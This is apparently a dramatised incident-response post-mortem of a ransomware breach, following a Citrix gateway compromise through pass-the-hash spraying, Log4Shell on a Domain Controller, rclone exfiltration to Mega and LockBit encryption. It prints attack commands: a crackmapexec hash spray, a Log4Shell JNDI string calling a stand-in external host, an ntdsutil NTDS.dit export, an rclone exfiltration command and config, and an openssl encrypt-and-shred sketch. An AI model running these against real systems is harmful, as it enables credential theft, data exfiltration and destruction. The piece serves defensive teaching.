Timestamp: 04:12 AM. Status: Containment achieved, but the patient is brain-dead. Here is how we let the house burn down because someone thought ‘Password123’ was a viable strategy.
I’m sitting in the data center, and the smell is a mix of ozone, stale Monster Energy, and the literal stench of failure. The CRAC units are screaming at 100% capacity, trying to cool down racks of servers that are doing nothing but churning through encrypted garbage. My eyes feel like someone rubbed them with sandpaper and dipped them in vinegar. Seventy-two hours. That’s how long it’s been since the first alert hit my phone. I haven’t seen the sun, but I’ve seen enough hex dumps to last a lifetime.
You want a report? You want to know why the “state-of-the-art” defense system you spent seven figures on didn’t do a damn thing? It’s because you can’t buy your way out of incompetence. You ignored every cybersecurity best practice we put in the 2022 budget proposal because the ROI wasn’t “visible” enough for the shareholders. Well, look at the ROI now. It’s zero. Actually, it’s negative.
Initial Access Vector: The Citrix Gateway to Hell
It started on Tuesday. Or maybe it was Monday. The days have blurred into a single, agonizing stream of packet captures. The entry point wasn’t some sophisticated zero-day developed by a nation-state. It was CVE-2023-3519. A remote code execution vulnerability in the Citrix ADC. We told you to patch it three weeks ago. The ticket is still “Pending Approval” in Jira.
The attacker sent a specially crafted, unauthenticated request that triggered a stack-based buffer overflow. No credentials, no phishing, no user interaction. And it reached the box because the management interface was, against every piece of advice I’ve ever given, exposed to the public internet.
Here is what the initial reconnaissance looked like on the edge:
# nmap -sV -p 443,80,22,445 --script=http-vuln-cve2023-3519 10.0.4.15
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-12 02:14 UTC
Nmap scan report for gateway.internal (10.0.4.15)
Host is up (0.00045s latency).
PORT    STATE SERVICE       VERSION
22/tcp  open  ssh           OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http          Apache httpd
443/tcp open  ssl/http      Citrix NetScaler ADC httpd
| http-vuln-cve2023-3519:
|   VULNERABLE:
|   Citrix ADC and Citrix Gateway remote code execution
|     State: VULNERABLE
|     IDs:  CVE:CVE-2023-3519
|_    A remote code execution vulnerability exists in Citrix ADC and Citrix Gateway.
445/tcp open  microsoft-ds?
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.32 seconds
They didn’t even have to try. They just knocked, and the door fell off the hinges. Once they had RCE on the Citrix box, they dropped a web shell. A simple, nasty little PHP script hidden in /var/netscaler/gui/vpn/media/logo.php. From there, they had a persistent foothold. They weren’t even using a fancy C2 framework at first. Just raw sockets and a dream.
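If you ever have to hunt one of these, the sweep is not complicated. Here is the sort of triage I ran across the surviving appliances; the date is our patch deadline, and the second path is an assumption to cover other NetScaler builds:

# Sweep web-served paths for PHP files dropped after the patch deadline
find /var/netscaler/gui /netscaler/ns_gui -type f -name '*.php' -newermt '2023-10-09' \
    -exec ls -la {} \; -exec sha256sum {} \;

One command, run on any ordinary Tuesday, and logo.php lights up like a flare.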
The kernel on that box? Linux Kernel 5.15.0-76-generic. Outdated. Vulnerable. The OpenSSL version? 3.0.7. We might as well have left the keys in the ignition and the engine running in a bad neighborhood.
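And before anyone asks how hard it is to know what you are running, the entire audit is one line:

# Ten seconds of due diligence on any Linux box
uname -r && openssl version
5.15.0-76-generic
OpenSSL 3.0.7 1 Nov 2022

Ten seconds per box. Nobody spent them.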
Persistence and the Failure of Internal Segmentation
Once they were in, they didn’t rush. These guys are professionals. They spent the first six hours just mapping the environment. They used netstat to see who we talk to. They looked at the ARP cache. They realized, much to their delight, that our internal network is as flat as a pancake. No VLANs that actually block traffic. No micro-segmentation. Just one big, happy family of vulnerable assets.
I watched the logs—after the fact, of course, because the real-time alerting was suppressed by the attackers—and I saw them running basic discovery.
# netstat -tulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State    PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN   842/sshd: /usr/sbin
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN   721/systemd-resolve
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN   1024/nsppe
tcp6       0      0 :::22                   :::*                    LISTEN   842/sshd: /usr/sbin
tcp6       0      0 :::80                   :::*                    LISTEN   1156/apache2
udp        0      0 127.0.0.53:53           0.0.0.0:*                        721/systemd-resolve
They saw the connections to the database servers. They saw the backup repo. They saw the Domain Controller. And because we use a shared local administrator password across the entire server farm—another “efficiency” measure requested by the IT Operations lead—once they dumped the memory on the Citrix box and found the cached credentials, they owned the whole kingdom.
On the first Windows box they landed on, they ran a modified build of Mimikatz, renamed to totally_not_malware.exe, to pull hashes. They didn’t even need to crack them. Pass-the-Hash let them authenticate to every machine that shared those credentials. It was like watching a virus spread through a petri dish.
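I don’t have their exact command line, but the tooling is public, so here is a plausible reconstruction of the spray (the subnet and hash are placeholders):

# Spray a stolen local-admin NT hash across the server subnet
crackmapexec smb 10.0.5.0/24 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:...' --local-auth

Every host that comes back “Pwn3d!” shares that password. For us, that was all of them.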
Lateral Movement: The SMB Free-for-All
By hour twelve, they had moved from the DMZ into the core production network. They targeted the file servers first. Why? Because that’s where the “crown jewels” live. All those spreadsheets with “Confidential” in the header that people keep saving to public shares.
They used smbclient and crackmapexec to spray the credentials they’d harvested. I’m looking at the journalctl logs from the primary file server right now. It’s a graveyard of failed and then suddenly successful authentication attempts.
Oct 13 03:14:22 fs-prod-01 sshd[18422]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=10.0.4.15 user=admin
Oct 13 03:14:24 fs-prod-01 sshd[18422]: Failed password for admin from 10.0.4.15 port 42134 ssh2
Oct 13 03:14:28 fs-prod-01 sshd[18425]: Accepted password for svc_backup from 10.0.4.15 port 42136 ssh2
Oct 13 03:14:28 fs-prod-01 systemd[1]: Started Session 452 of User svc_backup.
Oct 13 03:14:29 fs-prod-01 sudo[18450]: svc_backup : TTY=pts/0 ; PWD=/home/svc_backup ; USER=root ; COMMAND=/usr/bin/apt-get update
Wait, look at that last line. They used sudo on a backup service account. Why does the backup service account have passwordless sudo rights? I’ll tell you why: because the backup script kept failing two years ago and instead of fixing the permissions, someone just gave it root. That “someone” probably got a bonus for “solving the problem quickly.”
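For the audit: the offending line lives in /etc/sudoers.d/backup. I’m reconstructing it from memory, because the original file is now ciphertext, but it was the classic one-liner:

# The "quick fix" from two years ago that handed out root
svc_backup ALL=(ALL) NOPASSWD: ALL

That single line is the entire distance between “the backup job works now” and “the attacker is root on the file server.”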
From the file server, they pivoted to the Domain Controller. This is where it gets truly ugly. They exploited CVE-2021-44228—yeah, Log4j, the gift that keeps on giving—on an old monitoring agent that was running on the DC. We thought we’d patched all the Log4j instances. We missed one. One is all it takes.
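If you have never watched Log4Shell fire, the trigger is depressingly small. I haven’t recovered the exact string, but it would have been shaped like this (the attacker host here is a documentation address, not the real one):

2023-10-13 05:02:41 INFO HealthCheck - user-agent=${jndi:ldap://203.0.113.7:1389/o=...}

One interpolated token in a log line, and the “monitoring agent” obligingly fetched and executed attacker code on the Domain Controller.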
They didn’t just get Domain Admin. They got every identity in the company. They exported the NTDS.dit file: every username and every password hash for every employee we have. Your password, Mr. CEO? It was “Golfing2023!”. Very secure. It took them approximately four seconds to crack.
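I can’t yet prove which method they used to export it, but you don’t need malware for this step once you are Domain Admin. The boring, built-in way is ntdsutil’s “install from media” feature:

C:\> ntdsutil "activate instance ntds" "ifm" "create full C:\temp\ifm" quit quit

That hands over a consistent copy of the database plus the SYSTEM hive needed to decrypt it. Microsoft ships the tool; the attackers just read the documentation.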
Data Exfiltration: The Rclone Pipe
By hour thirty-six, they were ready to move the data. They didn’t use FTP. They didn’t use some weird custom protocol. They used Rclone. It’s a legitimate tool for syncing files to cloud storage. They configured it to point to a Mega.nz account.
They throttled the upload to stay just under the threshold of our “intelligent” traffic monitoring system. While your dashboard was showing green lights and “Normal Network Health,” four terabytes of intellectual property, payroll data, and customer PII were flowing out of the building.
I’m looking at the process list from the exfiltration point. It’s sickening.
# ps aux | grep rclone
root     19283  4.2  1.2 128432 45212 ?  Sl   Oct14  12:00 /tmp/rclone sync /mnt/data/shares remote:backup --config /tmp/rclone.conf --bwlimit 10M --transfers 4 --checkers 8
They even named the config file rclone.conf and put it in /tmp. They weren’t even trying to hide. They knew no one was looking. The SOC was too busy chasing false positives from the broken email filter to notice a massive, sustained outbound connection to a known file-sharing site.
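As far as I could recover it, the config was the stock Mega remote stanza, straight out of the rclone docs, credentials redacted:

[remote]
type = mega
user = ...
pass = ...

Four lines of INI, and a legitimate backup tool becomes an exfiltration pipe that no signature-based filter will ever flag.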
I tried to kill the process when I finally spotted it, but by then, the damage was done. The “sync” was 98% complete. I felt the blood drain out of my face as I watched the last few megabytes fly out the door. That was the moment I knew we weren’t just dealing with a breach; we were dealing with an extinction-level event for this company’s reputation.
The Encryption Phase: LockBit 3.0
Then came the boom. Hour sixty.
They didn’t just encrypt the servers. They went for the backups first. Our “immutable” backups? Turns out they weren’t so immutable when the attacker has the administrative credentials for the storage array. They wiped the snapshots. They formatted the backup volumes. They didn’t just lock the door; they burned the spare keys and filled the locks with lead.
The ransomware payload was LockBit 3.0. It’s fast. It’s efficient. It uses AES-256 in GCM mode for the file encryption and RSA-4096 to protect the per-file keys. Without the attacker’s private key, decryption is computationally infeasible.
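If you want to understand why there is no clever way out, the whole scheme can be sketched with stock openssl. This is illustrative only, not LockBit’s code: openssl enc cannot do GCM, so the sketch uses CBC, and attacker.pub stands in for the public key embedded in the payload.

# 1. Generate a random per-file key
openssl rand -hex 32 > /tmp/file.key
# 2. Encrypt the file with that key
openssl enc -aes-256-cbc -pbkdf2 -pass file:/tmp/file.key -in report.xlsx -out report.xlsx.HLP725QS
# 3. Seal the per-file key with the attacker's RSA-4096 public key
openssl pkeyutl -encrypt -pubin -inkey attacker.pub -in /tmp/file.key -out report.xlsx.key
# 4. Destroy the plaintext and the key
shred -u /tmp/file.key report.xlsx

Recovering the data now means breaking RSA-4096 or paying. Nobody is breaking RSA-4096.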
I was logged into the console of the main ERP server when it happened. The screen started flickering. Files were changing extensions to .HLP725QS. I tried to run top to see what was eating the CPU, but the top binary had already been encrypted. I tried ls. Encrypted. I tried to shut the damn thing down, but shutdown was gone too.
I had to pull the physical power cables. I was running through the aisles of the data center, ripping cords out of PDUs like a madman. The sound of hard drives clicking as they lost power was the only thing breaking the silence of the room. But it was too late. The encryption routine is multi-threaded and highly optimized. It can chew through a terabyte of data in minutes.
When I finally got the machines back up in a sandbox environment to see what was left, I found the ransom note. README_FOR_DECRYPT.txt. It was in every single directory. It didn’t ask for much: just $5 million in Monero. A bargain, really, considering they have the last ten years of our tax returns.
Recovery and the Smoking Ruins
So here we are. 04:12 AM.
I’ve spent the last twelve hours trying to find a single clean backup. I found one. It’s from 2019. It’s on a tape that was sitting in a drawer in the IT Manager’s office. It has the old payroll system and a bunch of memes from the Harambe era. It’s useless.
The current state of the infrastructure is “Total Loss.” We are rebuilding from scratch. I’m talking bare-metal installs. I’m talking about manually re-entering firewall rules from memory because the config backups were—you guessed it—on the encrypted file share.
The board keeps asking when the “systems will be back online.” The answer is: they won’t be. Not the ones you knew. We are building a new house on the ashes of the old one. And this time, if you try to tell me that MFA is “too inconvenient for the executives,” I’m going to hand you my badge and walk out the door.
We failed because we prioritized convenience over security. We failed because we treated IT as a cost center instead of the literal backbone of the business. We failed because we thought a “cyber insurance policy” was a substitute for a firewall.
The “Lessons from the Trenches” are simple, but I know you won’t listen:
1. Patching isn’t optional. If a CVE has a CVSS score of 9.8, you don’t wait for a change management meeting. You patch it.
2. Identity is the new perimeter. If you don’t have MFA on every single login—internal, external, service accounts—you don’t have security.
3. Segmentation saves lives. A breach in the DMZ should never, ever lead to a compromise of the Domain Controller.
4. Backups are only backups if they are offline or truly immutable. If the server can see the backup, the ransomware can see the backup. (A sketch of what “immutable” should actually mean follows below.)
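Since “immutable” is apparently a marketing term now, here is what it should mean, sketched with S3 Object Lock in compliance mode. The bucket name is hypothetical; the property that matters is that once the retention date is set, nobody, not even an admin with stolen credentials, can shorten it:

# Object Lock must be enabled when the bucket is created
aws s3api create-bucket --bucket corp-backups-worm --object-lock-enabled-for-bucket
# Upload a backup and pin it until a fixed date, in compliance mode
aws s3api put-object --bucket corp-backups-worm --key nightly-2023-10-15.tar.zst --body nightly-2023-10-15.tar.zst
aws s3api put-object-retention --bucket corp-backups-worm --key nightly-2023-10-15.tar.zst \
    --retention '{"Mode":"COMPLIANCE","RetainUntilDate":"2024-01-15T00:00:00Z"}'

A storage array that honors admin credentials for snapshot deletion is not immutable. It is just inconvenient.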
I’m going to go get a cup of coffee that’s probably 40% grounds and 60% bitterness. Then I’m going to start the 400th server rebuild of the week. Don’t call me. Don’t page me. Unless the building is literally on fire, I don’t want to hear from anyone who doesn’t know the difference between a TCP handshake and a milkshake.
The patient is dead. We’re just performing the autopsy now.
Signed,
The Lead Incident Responder (Who is far too old for this)
Technical Appendix for the Audit (That no one will read):
– Infection Vector: CVE-2023-3519 (Citrix ADC RCE)
– Secondary Exploit: CVE-2021-44228 (Log4j on internal monitoring node)
– OS Versions: Ubuntu 22.04.2 LTS (Kernel 5.15.0-76-generic), Windows Server 2019
– Encryption: LockBit 3.0 (AES-256-GCM / RSA-4096)
– Exfiltration Tool: Rclone v1.62.2
– C2 Infrastructure: Cobalt Strike Beacons (hidden in HTTPS traffic)
– Total Data Loss: ~4.2 TB
– Recovery Time Objective (RTO): Unknown. We are in the “praying for a miracle” phase.